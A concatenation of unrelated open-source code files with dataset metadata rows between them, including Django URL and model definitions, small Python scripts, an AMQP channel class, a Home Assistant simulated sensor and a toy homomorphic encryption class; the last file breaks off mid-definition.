<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>1 +
2 +
</pre>
</td>
<td class="source">
<pre><span class="miss">def foobar():
</span><span class="miss"> pass # This is a very long comment that was purposefully written so we could test how HTML rendering looks like when the boundaries of the page are reached. And here is a non-ascii char: \u015e
</span></pre>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>"""
| 29.940919
| 224
| 0.529708
|
2ccbbecdbdb095ac205d5fbf45454e716ad32e5d
| 540
|
py
|
Python
|
cride/circles/urls.py
|
EduuardoPerez/comparte-ride
|
e657e2397a9c8cc3104a716f13cc7547245015e4
|
[
"MIT"
] | null | null | null |
cride/circles/urls.py
|
EduuardoPerez/comparte-ride
|
e657e2397a9c8cc3104a716f13cc7547245015e4
|
[
"MIT"
] | null | null | null |
cride/circles/urls.py
|
EduuardoPerez/comparte-ride
|
e657e2397a9c8cc3104a716f13cc7547245015e4
|
[
"MIT"
] | null | null | null |
"""Circles URLs."""
# Django
from django.urls import include, path
# Django REST Framework
from rest_framework.routers import DefaultRouter
# Views
from .views import circles as circle_views
from .views import memberships as membership_views
router = DefaultRouter()
router.register(r'circles', circle_views.CircleViewSet, basename='circle')
router.register(
r'circles/(?P<slug_name>[-a-zA-Z0-9_-]+)/members',
membership_views.MembershipViewSet,
basename='membership'
)
urlpatterns = [
path('', include(router.urls))
]
| 22.5
| 74
| 0.75
|
e7ab25e820084701fbfcebea9260921b3086d449
| 484
|
py
|
Python
|
ExamenDeFundamentosDeP/Examen1.py
|
Sharnol-Tec/Examen
|
fc859c5a56cf9e550e903296eecdb53b42ec9b2f
|
[
"Apache-2.0"
] | null | null | null |
ExamenDeFundamentosDeP/Examen1.py
|
Sharnol-Tec/Examen
|
fc859c5a56cf9e550e903296eecdb53b42ec9b2f
|
[
"Apache-2.0"
] | null | null | null |
ExamenDeFundamentosDeP/Examen1.py
|
Sharnol-Tec/Examen
|
fc859c5a56cf9e550e903296eecdb53b42ec9b2f
|
[
"Apache-2.0"
] | null | null | null |
#datos de entrada
PrimeraUnidadSLLB=float(input("Ingrese la nota de la PrimeraUnidadSLLB: "))
SegundaUnidadSLLB=float(input("Ingrese la nota de la SegundaUnidadSLLB: "))
TerceraUnidadSLLB=float(input("Ingrese la nota de la TerceraUnidadSLLB: "))
TrabajoFinalSLLB=float(input("Ingrese la nota del TrabajoFinalSLLB: "))
#proceso
nota=PrimeraUnidadSLLB*0.2 + SegundaUnidadSLLB*0.15 + TerceraUnidadSLLB*0.15 + TrabajoFinalSLLB*0.5
#salida
print("nota final del estudiante es:",nota)
| 53.777778
| 99
| 0.789256
|
62b99b8da2aecb88766819c7135ff9c55eef6434
| 1,808
|
py
|
Python
|
src/users/actions.py
|
josue0ghost/Python-and-MySQL-console-application
|
c82641c5ccaae3eb526decd2c96baa4457613a2a
|
[
"MIT"
] | null | null | null |
src/users/actions.py
|
josue0ghost/Python-and-MySQL-console-application
|
c82641c5ccaae3eb526decd2c96baa4457613a2a
|
[
"MIT"
] | null | null | null |
src/users/actions.py
|
josue0ghost/Python-and-MySQL-console-application
|
c82641c5ccaae3eb526decd2c96baa4457613a2a
|
[
"MIT"
] | null | null | null |
import users.user as user
import grades.actions as grade
class Actions:
def signup(self):
print("Selected item: signup")
name = input("Your name: ")
lastname = input("Your last name: ")
email = input("Your email: ")
password = input("Choose a password: ")
newUser = user.User(name, lastname, email, password)
reg = newUser.register()
if reg[0] >= 1:
print(f"{reg[1].name}, you've been registered with email {reg[1].email}")
else:
print("Registration failed")
def signin(self):
try:
email = input("Email: ")
password = input("Password: ")
existingUser = user.User('', '', email, password)
login = existingUser.identify()
# id | name | lastname | email | password | date
if email == login[3]:
print(f"Welcome, {login[1]}")
self.mainMenu(login)
except Exception as e:
print(type(e))
print(type(e).__name__)
print("Login failed")
def mainMenu(self, user):
print("""
Available options:
- Create grade (create)
- Show grades (show)
- Delete grade (delete)
- Log out (exit)
""")
action = input("What do you want to do?: ")
gradeActions = grade.Actions()
if action == "create":
gradeActions.create(user)
self.mainMenu(user)
elif action == "show":
gradeActions.show(user)
self.mainMenu(user)
elif action == "delete":
gradeActions.delete(user)
self.mainMenu(user)
elif action == "exit":
exit()
| 28.25
| 85
| 0.499447
|
36cc56a3d75181b864d339aa3b5b0b437e605cf8
| 654
|
py
|
Python
|
mojo/system/PRESUBMIT.py
|
Fusion-Rom/android_external_chromium_org
|
d8b126911c6ea9753e9f526bee5654419e1d0ebd
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2015-08-13T21:04:58.000Z
|
2015-08-13T21:04:58.000Z
|
mojo/system/PRESUBMIT.py
|
Fusion-Rom/android_external_chromium_org
|
d8b126911c6ea9753e9f526bee5654419e1d0ebd
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
mojo/system/PRESUBMIT.py
|
Fusion-Rom/android_external_chromium_org
|
d8b126911c6ea9753e9f526bee5654419e1d0ebd
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2020-11-04T06:34:36.000Z
|
2020-11-04T06:34:36.000Z
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Presubmit script for mojo/system.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details about the presubmit API built into depot_tools.
"""
def CheckChangeOnUpload(input_api, output_api):
results = []
results += input_api.canned_checks.CheckChangeHasOnlyOneEol(input_api,
output_api)
results += input_api.canned_checks.CheckPatchFormatted(input_api, output_api)
return results
| 38.470588
| 79
| 0.718654
|
12934dffdf93d2ba8c4aaff60d85e2a3fd0b25e0
| 839
|
py
|
Python
|
homomorphic_encryption/secret_key_swhe.py
|
binary-signal/some-what-homomorphic-encryption
|
861c752416e2669a4b9e1824f93b5593a8b4abd6
|
[
"BSD-3-Clause"
] | 1
|
2019-02-09T06:36:54.000Z
|
2019-02-09T06:36:54.000Z
|
homomorphic_encryption/secret_key_swhe.py
|
binary-signal/some-what-homomorphic-encryption
|
861c752416e2669a4b9e1824f93b5593a8b4abd6
|
[
"BSD-3-Clause"
] | null | null | null |
homomorphic_encryption/secret_key_swhe.py
|
binary-signal/some-what-homomorphic-encryption
|
861c752416e2669a4b9e1824f93b5593a8b4abd6
|
[
"BSD-3-Clause"
] | 1
|
2018-07-06T10:03:53.000Z
|
2018-07-06T10:03:53.000Z
|
# -*- coding: utf-8 -*-
from keys.secret_key import SecretKey
from random import randint
from math import sqrt
class secret_swhe:
def __init__(self, lambda_, secret_key=None, eta=10):
self.lambda_ = lambda_
self.eta = eta
if secret_key is None:
self.p = self._key_gen(eta)
else:
self.p = secret_key
def _key_gen(self, eta):
k = SecretKey(eta)
return k.key_gen()
def encrypt(self, m):
while True:
r = randint(round(2 ** (sqrt(self.eta) - 1)), round(2 ** sqrt(self.eta)) + 1)
if abs(2 * r) < self.p / 2: # this must hold to find q
break
q = randint(2 ** ((self.eta ** 3) - 1), 2 ** (self.eta ** 3))
return self.p * q + 2 * r + m
def decrypt(self, c):
return (c % self.p) % 2
| 27.966667
| 89
| 0.531585
|
d3e4f155aef63c0aa0f2d540868c2ca27cec90e9
| 1,622
|
py
|
Python
|
day-15/part-1/th-ch.py
|
lypnol/adventofcode-2021
|
8ba277d698e8c59ca9cd554acc135473f5964b87
|
[
"MIT"
] | 6
|
2021-11-29T15:32:27.000Z
|
2021-12-10T12:24:26.000Z
|
day-15/part-1/th-ch.py
|
lypnol/adventofcode-2021
|
8ba277d698e8c59ca9cd554acc135473f5964b87
|
[
"MIT"
] | 9
|
2021-11-29T15:38:04.000Z
|
2021-12-13T14:54:16.000Z
|
day-15/part-1/th-ch.py
|
lypnol/adventofcode-2021
|
8ba277d698e8c59ca9cd554acc135473f5964b87
|
[
"MIT"
] | 3
|
2021-12-02T19:11:44.000Z
|
2021-12-22T20:52:47.000Z
|
from tool.runners.python import SubmissionPy
from queue import PriorityQueue
class ThChSubmission(SubmissionPy):
def run(self, s):
"""
:param s: input in string format
:return: solution flag
"""
# Your code goes here
m = [[int(i) for i in line] for line in s.splitlines()]
# Dijkstra with priority queue
D = {(x, y): float("inf") for x in range(len(m)) for y in range(len(m))}
D[(0, 0)] = 0
pq = PriorityQueue()
visited = set()
pq.put((0, (0, 0)))
while not pq.empty():
(dist, (x, y)) = pq.get()
visited.add((x, y))
for (dx, dy) in [(-1, 0), (0, -1), (1, 0), (0, 1)]:
if 0 <= x + dx < len(m) and 0 <= y + dy < len(m):
distance = m[y + dy][x + dx]
if (x + dx, y + dy) not in visited:
old_cost = D[(x + dx, y + dy)]
new_cost = D[(x, y)] + distance
if new_cost < old_cost:
pq.put((new_cost, (x + dx, y + dy)))
D[(x + dx, y + dy)] = new_cost
if x + dx == len(m) - 1 and y + dy == len(m) - 1:
return new_cost
def test_th_ch():
"""
Run `python -m pytest ./day-15/part-1/th-ch.py` to test the submission.
"""
assert (
ThChSubmission().run(
"""
1163751742
1381373672
2136511328
3694931569
7463417111
1319128137
1359912421
3125421639
1293138521
2311944581
""".strip()
)
== 40
)
| 26.590164
| 80
| 0.451295
|
e62b5080bbeda124023abebade836b7ac8272b64
| 2,421
|
py
|
Python
|
src/lto/crypto.py
|
mustafa-travisci/lto-api.python
|
0493a46b69575e94d09a038dadf472b46f88d036
|
[
"MIT"
] | null | null | null |
src/lto/crypto.py
|
mustafa-travisci/lto-api.python
|
0493a46b69575e94d09a038dadf472b46f88d036
|
[
"MIT"
] | null | null | null |
src/lto/crypto.py
|
mustafa-travisci/lto-api.python
|
0493a46b69575e94d09a038dadf472b46f88d036
|
[
"MIT"
] | null | null | null |
import base64
import hashlib
import pyblake2
import base58
import inflection
import struct
str2bytes = lambda s: s.encode('latin-1')
bytes2str = lambda b: ''.join(map(chr, b))
str2list = lambda s: [c for c in s]
def sha256(s):
return hashlib.sha256(str2bytes(s)).digest()
def hash_chain(s):
a = pyblake2.blake2b(s, digest_size=32).digest()
b = hashlib.sha256(a).digest()
return ''.join(map(chr, b))
def get_network(address):
decoded_address = base58.b58decode(address)
return str(decoded_address)[6]
def recode(string, from_encoding, to_encoding):
binary = decode(string, from_encoding)
return encode(binary, to_encoding)
def decode(string, encoding: str):
if encoding == 'base58':
return base58.b58decode(string)
elif encoding == 'base64':
return base64.b64decode(string)
elif encoding == 'hex':
return bytes.fromhex(string)
else:
raise Exception('Failed to decode')
def encode(string, encoding: str):
if encoding == 'base58':
return base58.b58encode(string)
elif encoding == 'base64':
return base64.b64encode(string)
elif encoding == 'hex':
return string.hex()
else:
raise Exception('Failed to encode')
def validate_address(address):
ADDRESS_VERSION = 1
ADDRESS_CHECKSUM_LENGTH = 4
ADDRESS_HASH_LENGTH = 20
ADDRESS_LENGTH = 1 + 1 + ADDRESS_CHECKSUM_LENGTH + ADDRESS_HASH_LENGTH
addr = bytes2str(base58.b58decode(address))
if addr[0] != chr(ADDRESS_VERSION):
raise Exception('Wrong address version')
elif len(addr) != ADDRESS_LENGTH:
raise Exception('Wrong address length')
elif addr[-ADDRESS_CHECKSUM_LENGTH:] != hash_chain(
str2bytes(addr[:-ADDRESS_CHECKSUM_LENGTH]))[:ADDRESS_CHECKSUM_LENGTH]:
raise Exception('Wrong address checksum')
else:
return True
def key_type_id(key_type):
if key_type == 'ed25519':
return b'\1'
elif key_type == 'secp256k1':
return b'\2'
elif key_type == 'secp256r1':
return b'\3'
elif key_type == 'rsa':
return b'\4'
else:
raise Exception('Key Type not supported')
def merge_dicts(x, y):
z = x.copy()
z.update(y)
return z
def compare_data_transaction(data, transaction):
for key in data:
key2 = inflection.underscore(key)
assert data[key] == getattr(transaction, key2)
| 25.21875
| 82
| 0.658819
|
ddd5d99ac97893870538a5f6e8dcc23210f2ce51
| 4,845
|
py
|
Python
|
homeassistant/components/simulated/sensor.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 30,023
|
2016-04-13T10:17:53.000Z
|
2020-03-02T12:56:31.000Z
|
homeassistant/components/simulated/sensor.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 24,710
|
2016-04-13T08:27:26.000Z
|
2020-03-02T12:59:13.000Z
|
homeassistant/components/simulated/sensor.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 11,956
|
2016-04-13T18:42:31.000Z
|
2020-03-02T09:32:12.000Z
|
"""Adds a simulated sensor."""
from __future__ import annotations
from datetime import datetime
import math
from random import Random
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity
from homeassistant.const import CONF_NAME
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
import homeassistant.util.dt as dt_util
CONF_AMP = "amplitude"
CONF_FWHM = "spread"
CONF_MEAN = "mean"
CONF_PERIOD = "period"
CONF_PHASE = "phase"
CONF_SEED = "seed"
CONF_UNIT = "unit"
CONF_RELATIVE_TO_EPOCH = "relative_to_epoch"
DEFAULT_AMP = 1
DEFAULT_FWHM = 0
DEFAULT_MEAN = 0
DEFAULT_NAME = "simulated"
DEFAULT_PERIOD = 60
DEFAULT_PHASE = 0
DEFAULT_SEED = 999
DEFAULT_UNIT = "value"
DEFAULT_RELATIVE_TO_EPOCH = True
ICON = "mdi:chart-line"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_AMP, default=DEFAULT_AMP): vol.Coerce(float),
vol.Optional(CONF_FWHM, default=DEFAULT_FWHM): vol.Coerce(float),
vol.Optional(CONF_MEAN, default=DEFAULT_MEAN): vol.Coerce(float),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PERIOD, default=DEFAULT_PERIOD): cv.positive_int,
vol.Optional(CONF_PHASE, default=DEFAULT_PHASE): vol.Coerce(float),
vol.Optional(CONF_SEED, default=DEFAULT_SEED): cv.positive_int,
vol.Optional(CONF_UNIT, default=DEFAULT_UNIT): cv.string,
vol.Optional(
CONF_RELATIVE_TO_EPOCH, default=DEFAULT_RELATIVE_TO_EPOCH
): cv.boolean,
}
)
def setup_platform(
hass: HomeAssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the simulated sensor."""
name = config.get(CONF_NAME)
unit = config.get(CONF_UNIT)
amp = config.get(CONF_AMP)
mean = config.get(CONF_MEAN)
period = config.get(CONF_PERIOD)
phase = config.get(CONF_PHASE)
fwhm = config.get(CONF_FWHM)
seed = config.get(CONF_SEED)
relative_to_epoch = config.get(CONF_RELATIVE_TO_EPOCH)
sensor = SimulatedSensor(
name, unit, amp, mean, period, phase, fwhm, seed, relative_to_epoch
)
add_entities([sensor], True)
class SimulatedSensor(SensorEntity):
"""Class for simulated sensor."""
def __init__(
self, name, unit, amp, mean, period, phase, fwhm, seed, relative_to_epoch
):
"""Init the class."""
self._name = name
self._unit = unit
self._amp = amp
self._mean = mean
self._period = period
self._phase = phase # phase in degrees
self._fwhm = fwhm
self._seed = seed
self._random = Random(seed) # A local seeded Random
self._start_time = (
datetime(1970, 1, 1, tzinfo=dt_util.UTC)
if relative_to_epoch
else dt_util.utcnow()
)
self._relative_to_epoch = relative_to_epoch
self._state = None
def time_delta(self):
"""Return the time delta."""
dt0 = self._start_time
dt1 = dt_util.utcnow()
return dt1 - dt0
def signal_calc(self):
"""Calculate the signal."""
mean = self._mean
amp = self._amp
time_delta = self.time_delta().total_seconds() * 1e6 # to milliseconds
period = self._period * 1e6 # to milliseconds
fwhm = self._fwhm / 2
phase = math.radians(self._phase)
if period == 0:
periodic = 0
else:
periodic = amp * (math.sin((2 * math.pi * time_delta / period) + phase))
noise = self._random.gauss(mu=0, sigma=fwhm)
return round(mean + periodic + noise, 3)
async def async_update(self):
"""Update the sensor."""
self._state = self.signal_calc()
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def native_value(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return ICON
@property
def native_unit_of_measurement(self):
"""Return the unit this state is expressed in."""
return self._unit
@property
def extra_state_attributes(self):
"""Return other details about the sensor state."""
return {
"amplitude": self._amp,
"mean": self._mean,
"period": self._period,
"phase": self._phase,
"spread": self._fwhm,
"seed": self._seed,
"relative_to_epoch": self._relative_to_epoch,
}
| 30.28125
| 84
| 0.6516
|
8200064181b798609c4bfc5d935b29af3aa9ae47
| 4,641
|
py
|
Python
|
haigha/classes/channel_class.py
|
ask/haigha
|
1f87bbb37371f5ae6212c5af32ab4e8c5cebe34c
|
[
"BSD-3-Clause"
] | 1
|
2022-02-18T05:41:30.000Z
|
2022-02-18T05:41:30.000Z
|
haigha/classes/channel_class.py
|
ask/haigha
|
1f87bbb37371f5ae6212c5af32ab4e8c5cebe34c
|
[
"BSD-3-Clause"
] | null | null | null |
haigha/classes/channel_class.py
|
ask/haigha
|
1f87bbb37371f5ae6212c5af32ab4e8c5cebe34c
|
[
"BSD-3-Clause"
] | null | null | null |
from haigha.classes import ProtocolClass
from haigha.frames import MethodFrame
from haigha.writer import Writer
class ChannelClass(ProtocolClass):
'''
Implements the AMQP Channel class
'''
def __init__(self, *args, **kwargs):
super(ChannelClass, self).__init__(*args, **kwargs)
self.dispatch_map = {
11 : self._recv_open_ok,
20 : self._recv_flow,
21 : self._recv_flow_ok,
40 : self._recv_close,
41 : self._recv_close_ok,
}
self._closed = False
self._close_info = {
'reply_code' : 0,
'reply_text' : 'first connect',
'class_id' : 0,
'method_id' : 0
}
self._active = True
self._flow_control_cb = None
@property
def closed(self):
'''Return whether this channel has been closed.'''
return self._closed
@property
def close_info(self):
'''Return dict with information on why this channel is closed. Will
return None if the channel is open.'''
return self._close_info if self._closed else None
@property
def active(self):
'''
Return True if flow control turned off, False if flow control is on.
'''
return self._active
def set_flow_cb(self, cb):
'''
Set a callback that will be called when the state of flow control has changed.
The caller should use closures if they need to receive a handle to the channel
on which flow control changes.
'''
self._flow_control_cb = cb
def open(self):
'''
Open the channel for communication.
'''
args = Writer()
args.write_shortstr('')
self.send_frame( MethodFrame(self.channel_id, 20, 10, args) )
self.channel.add_synchronous_cb( self._recv_open_ok )
def _recv_open_ok(self, method_frame):
pass
def activate(self):
'''
Activate this channel (disable flow control).
'''
if not self._active:
self._send_flow( True )
def deactivate(self):
'''
Deactivate this channel (enable flow control).
'''
if self._active:
self._send_flow( False )
def _send_flow(self, active):
'''
Send a flow control command.
'''
args = Writer()
args.write_bit( active )
self.send_frame( MethodFrame(self.channel_id, 20, 20, args) )
self.channel.add_synchronous_cb( self._recv_flow_ok )
def _recv_flow(self, method_frame):
'''
Receive a flow control command from the broker
'''
self._active = method_frame.args.read_bit()
args = Writer()
args.write_bit( self._active )
self.send_frame( MethodFrame(self.channel_id, 20, 21, args) )
if self._flow_control_cb is not None:
self._flow_control_cb()
def _recv_flow_ok(self, method_frame):
'''
Receive a flow control ack from the broker.
'''
self._active = method_frame.args.read_bit()
if self._flow_control_cb is not None:
self._flow_control_cb()
def close(self, reply_code=0, reply_text='', class_id=0, method_id=0):
'''
Close this channel. Caller has the option of specifying the reason for
closure and the class and method ids of the current frame in which an error
occurred. If in the event of an exception, the channel will be marked
as immediately closed. If channel is already closed, call is ignored.
'''
if self._closed: return
self._close_info = {
'reply_code' : reply_code,
'reply_text' : reply_text,
'class_id' : class_id,
'method_id' : method_id
}
try:
args = Writer()
args.write_short( reply_code )
args.write_shortstr( reply_text )
args.write_short( class_id )
args.write_short( method_id )
self.send_frame( MethodFrame(self.channel_id, 20, 40, args) )
self.channel.add_synchronous_cb( self._recv_close_ok )
except:
self.logger.error("Failed to close channel %d",
self.channel_id, exc_info=True)
# Immediately set the closed flag so that no more frames can be sent
self._closed = True
def _recv_close(self, method_frame):
'''
Receive a close command from the broker.
'''
self._close_info = {
'reply_code' : method_frame.args.read_short(),
'reply_text' : method_frame.args.read_shortstr(),
'class_id' : method_frame.args.read_short(),
'method_id' : method_frame.args.read_short()
}
self.send_frame( MethodFrame(self.channel_id, 20, 41) )
# Must set this *after* send_frame so that it doesn't throw an exception
self._closed = True
def _recv_close_ok(self, method_frame):
'''
Receive a close ack from the broker.
'''
self._closed = True
| 27.790419
| 82
| 0.653307
|
318e662b8b2eebe70758232791dfea2c111ea320
| 20,470
|
py
|
Python
|
FusionIIIT/applications/office_module/models.py
|
pTidke/Fusion
|
7a0da7239bd97df7a9849163c5438c0c917c2e55
|
[
"bzip2-1.0.6"
] | 1
|
2020-01-16T17:06:22.000Z
|
2020-01-16T17:06:22.000Z
|
FusionIIIT/applications/office_module/models.py
|
rishi2907/Fusion
|
7a0da7239bd97df7a9849163c5438c0c917c2e55
|
[
"bzip2-1.0.6"
] | null | null | null |
FusionIIIT/applications/office_module/models.py
|
rishi2907/Fusion
|
7a0da7239bd97df7a9849163c5438c0c917c2e55
|
[
"bzip2-1.0.6"
] | null | null | null |
import datetime
from django.db import models
from applications.academic_information.models import (Course, Grades,
Instructor, Meeting, Spi,
Student)
from applications.academic_procedures.models import Thesis
from applications.filetracking.models import Tracking
from applications.globals.models import (DepartmentInfo, Designation,
ExtraInfo, Faculty, HoldsDesignation,
Staff)
from applications.leave.models import Leave
from .models_office_students import *
from applications.filetracking.models import File
class Constants:
DAY_CHOICES = (
('Monday', 'Monday'),
('Tuesday', 'Tuesday'),
('Wednesday', 'Wednesday'),
('Thursday', 'Thursday'),
('Friday', 'Friday'),
)
ACTION = (
('forward', 'forwarded'),
('revert', 'revert'),
('accept', 'accept'),
('reject', 'reject')
)
STATUS = (
('0', 'unseen'),
('1', 'seen')
)
APPROVAL = (
('0', 'reject'),
('1', 'accept')
)
APPROVAL_TYPE = (
('APPROVED', 'Approved'),
('PENDING', 'Pending'),
)
HALL_NO = (
('HALL-1','hall-1'),
('HALL-3','hall-3'),
('HALL-4','hall-4'),
)
DEPARTMENT=(
('civil','civil'),
('electrical','electrical')
)
BUILDING=(
('corelab','corelab'),
('computer center','computer center'),
('hostel','hostel'),
('mess','mess'),
('library','library'),
('cc','cc')
)
STATUS_CHOICES = (
('Forward', 'FORWARD'),
('Accept', 'ACCEPT')
)
PROJECT_TYPE = (
('SRes', 'Sponsored Research'),
('Consultancy', 'Consultancy'),
('Testing', 'Testing')
)
RESPONSE_TYPE = (
('Approve', 'Approve'),
('Disapprove', 'Disapprove'),
('Pending' , 'Pending')
)
RESPONSE_TYPE1 = (
('Forwarded', 'Forwarded'),
('Pending' , 'Pending')
)
TICK_TYPE = (
('NO', 'YES'),
('NO', 'NO')
)
PROJECT_OPERATED = (
('PI', 'Only by PI'),
('any', 'Either PI or CO-PI')
)
TRAVEL_CHOICES = (
('road', 'ROAD'),
('rail', 'RAIL')
)
TICK_TYPE = (
('Computer Graphics', 'Computer Graphics'),
('Machine Learning', 'Machine Learning'),
('Image Processing','Image Processing'),
('Data Structure','Data Structure')
)
APPROVAL_TYPE = (
('APPROVED', 'Approved'),
('PENDING', 'Pending'),
)
PURCHASE_STATUS = (
('0', "Pending"),
('1', "Approve"),
('2', "Items Ordered"),
('3', "Items Puchased"),
('4', "Items Delivered"),
)
APPROVE_TAG = (
('0', "Pending"),
('1', "Approve"),
('-1',"Rejected"),
)
PURCHASE_TYPE = (
('0', "Amount < 25000"),
('1', "25000<Amount<250000"),
('2', "250000<Amount < 2500000"),
('3', "Amount>2500000"),
)
NATURE_OF_ITEM1 = (
('0', "Non-consumable"),
('1', "Consumable"),
)
NATURE_OF_ITEM2 = (
('0', "Equipment"),
('1', "Machinery"),
('2', "Furniture"),
('3', "Fixture"),
)
ITEM_TYPE = (
('0', "Non-consumable"),
('1', "Consumable"),
)
class Assistantship(models.Model):
student_id = models.ForeignKey(Student, on_delete=models.CASCADE)
instructor_id = models.ForeignKey(Instructor, on_delete=models.CASCADE)
file = models.FileField(upload_to='documents/',blank=True,null=True)
action = models.IntegerField(default=0)
comments = models.CharField(null=True,blank=True,max_length=150);
class Meta:
db_table = 'Assistantship'
unique_together = ('student_id','instructor_id')
def __str__(self):
return '{} - {}'.format(self.student_id, self.instructor_id)
# Dean RSPC Begins ....................................................................................................
"""
DEAN RSPC BEGINS
Table for Project Registration
"""
class Project_Registration(models.Model):
PI_id = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE)
project_title = models.CharField(max_length=200)
sponsored_agency = models.CharField(max_length=100)
CO_PI = models.CharField(max_length=100, null=True)
start_date = models.DateField(null=True, blank=True)
duration = models.IntegerField(default=0)
agreement = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='NO')
amount_sanctioned = models.IntegerField(default=0)
project_type = models.CharField(choices=Constants.PROJECT_TYPE,
max_length=25)
project_operated = models.CharField(choices=Constants.PROJECT_OPERATED,
max_length=50, default='me')
remarks = models.CharField(max_length=200)
fund_recieved_date = models.DateField(null=True, blank=True)
HOD_response = models.CharField(choices=Constants.RESPONSE_TYPE1,
max_length=10, default='Pending')
DRSPC_response = models.CharField(choices=Constants.RESPONSE_TYPE,
max_length=10, default='Pending')
applied_date = models.DateField(null=True, blank=True)
description = models.CharField(max_length=200, null=True)
file = models.FileField(upload_to='documents/', blank=True, null=True)
def __str__(self):
return self.project_title
"""
DEAN RSPC
Table for Project Extension
"""
class Project_Extension(models.Model):
project_id = models.ForeignKey(Project_Registration, on_delete=models.CASCADE)
date = models.DateField(null=True, blank=True)
extended_duration = models.IntegerField(default=0)
extension_details = models.CharField(max_length=300)
HOD_response = models.CharField(choices=Constants.RESPONSE_TYPE1,
max_length=10, default='Pending')
DRSPC_response = models.CharField(choices=Constants.RESPONSE_TYPE,
max_length=10, default='Pending')
file = models.FileField(upload_to='documents/', blank=True, null=True)
def __str__(self):
return str(self.project_id)
"""
DEAN RSPC
Table for Project Closure
"""
class Project_Closure(models.Model):
project_id = models.ForeignKey(Project_Registration, on_delete=models.CASCADE)
completion_date = models.DateField(null=True, blank=True)
# extended_duration = models.CharField(max_length=200, blank=True, null=True)
date = models.DateField(null=True, blank=True)
expenses_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
expenses_dues_description = models.CharField(max_length=200, blank=True, null=True)
payment_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
payment_dues_description = models.CharField(max_length=200, blank=True, null=True)
salary_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
salary_dues_description = models.CharField(max_length=200, blank=True, null=True)
advances_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
advances_description = models.CharField(max_length=200, blank=True, null=True)
others_dues = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
other_dues_description = models.CharField(max_length=200, blank=True, null=True)
overhead_deducted = models.CharField(choices=Constants.TICK_TYPE,
max_length=10, default='Pending')
overhead_description = models.CharField(max_length=200, blank=True, null=True)
HOD_response = models.CharField(choices=Constants.RESPONSE_TYPE1,
max_length=10, default='Pending')
DRSPC_response = models.CharField(choices=Constants.RESPONSE_TYPE,
max_length=10, default='Pending')
remarks = models.CharField(max_length=300, null=True)
extended_duration = models.CharField(default='0', max_length=100, null=True)
def __str__(self):
return str(self.project_id)
"""
DEAN RSPC
Table for Project Reallocation
"""
class Project_Reallocation(models.Model):
project_id = models.ForeignKey(Project_Registration, on_delete=models.CASCADE)
date = models.DateField(null=True, blank=True)
previous_budget_head = models.CharField(max_length=300)
previous_amount = models.IntegerField(default=0)
pf_no = models.CharField(max_length=100, null=True)
new_budget_head = models.CharField(max_length=300)
new_amount = models.IntegerField(default=0)
transfer_reason = models.CharField(max_length=300)
HOD_response = models.CharField(choices=Constants.RESPONSE_TYPE1,
max_length=10, default='Pending')
DRSPC_response = models.CharField(choices=Constants.RESPONSE_TYPE,
max_length=10, default='Pending')
def __str__(self):
return str(self.project_id)
# Dean RSPC ends ....................................................................................................
class Member(models.Model):
member_id = models.ForeignKey(Faculty)
meeting_id = models.ForeignKey(Meeting)
class Meta:
db_table = 'Member'
unique_together = (('member_id', 'meeting_id'))
def __str__(self):
return str(self.member_id)
class Registrar(models.Model):
file_name = models.CharField(max_length=50)
date = models.DateField()
purpose = models.CharField(max_length=100)
status = models.CharField(max_length=1, choices=Constants.STATUS, default=0)
file = models.FileField()
class Requisitions(models.Model):
userid=models.ForeignKey(ExtraInfo,on_delete=models.CASCADE)
req_date=models.DateTimeField(auto_now_add=True)
title=models.CharField(max_length=50)
department=models.CharField(max_length=50,choices=Constants.DEPARTMENT)
building=models.CharField(max_length=50,choices=Constants.BUILDING)
description=models.CharField(max_length=200)
assign_file=models.ForeignKey(File, on_delete=models.CASCADE, null=True)
tag=models.IntegerField(default=0) # 0: accepted 1: rejected
def __str__(self):
return str(self.id)
class Filemovement(models.Model):
rid=models.ForeignKey(Requisitions,on_delete=models.CASCADE)
sentby=models.ForeignKey(HoldsDesignation,on_delete=models.CASCADE,related_name='sent_by')
receivedby=models.ForeignKey(HoldsDesignation,on_delete=models.CASCADE,related_name='received_by')
date=models.DateTimeField(auto_now_add=True)
remarks=models.CharField(max_length=200,null=True)
actionby_receiver=models.CharField(max_length=50,choices=Constants.ACTION)
class vendor(models.Model):
vendor_name = models.CharField(max_length=100)
vendor_address = models.CharField(max_length=200)
vendor_item = models.CharField(max_length=200)
class Meta:
db_table = 'vendor'
class apply_for_purchase(models.Model):
indentor_name = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE,related_name='indentor_name')
# designation = models.ForeignKey(Designation, on_delete=models.CASCADE)
